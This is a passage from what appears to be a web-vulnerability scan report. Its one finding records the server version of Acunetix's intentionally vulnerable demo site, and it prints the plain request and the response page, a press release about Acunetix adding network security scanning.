href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" 